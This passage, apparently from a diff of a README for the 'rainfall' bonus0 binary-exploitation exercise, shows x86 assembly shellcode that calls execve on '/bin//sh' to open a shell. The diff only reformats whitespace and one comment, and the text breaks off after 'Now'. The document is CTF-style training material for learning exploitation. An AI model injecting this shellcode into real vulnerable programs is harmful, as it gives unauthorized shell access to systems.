Taiwing/rainfall/bonus0/README.md

 section .text
 global _start
 _start:
-xor		edx, edx	; set edx to 0
-push	edx			; push it to the stack to end the command string push	0x68732f2f	; "//sh" end of the command string push	0x6e69622f	; "/bin" start of the command string mov		ebx, esp	; set ebx to the start of the command string push	edx			; push a NULL push	ebx			; push the command string's address mov		ecx, esp	; set ecx as a pointer to the command string's address (argv) push	0xb			; push 11 (execve int number) pop		eax			; set eax to 11 int		0x80		; call execve
+xor     edx, edx    ; set edx to 0 push    edx         ; push it to the stack to end the command string push    0x68732f2f  ; "//sh" end of the command string push    0x6e69622f  ; "/bin" start of the command string mov     ebx, esp    ; set ebx to the start of the command string push    edx         ; push a NULL push    ebx         ; push the command string's address mov     ecx, esp    ; set ecx as a pointer to the command string's address (argv) push    0xb         ; push 11 (execve interrupt number) pop     eax         ; set eax to 11 int	    0x80        ; call execve
 ```

 This will execute execve with "/bin//sh" as parameter and open us a shell.
 Now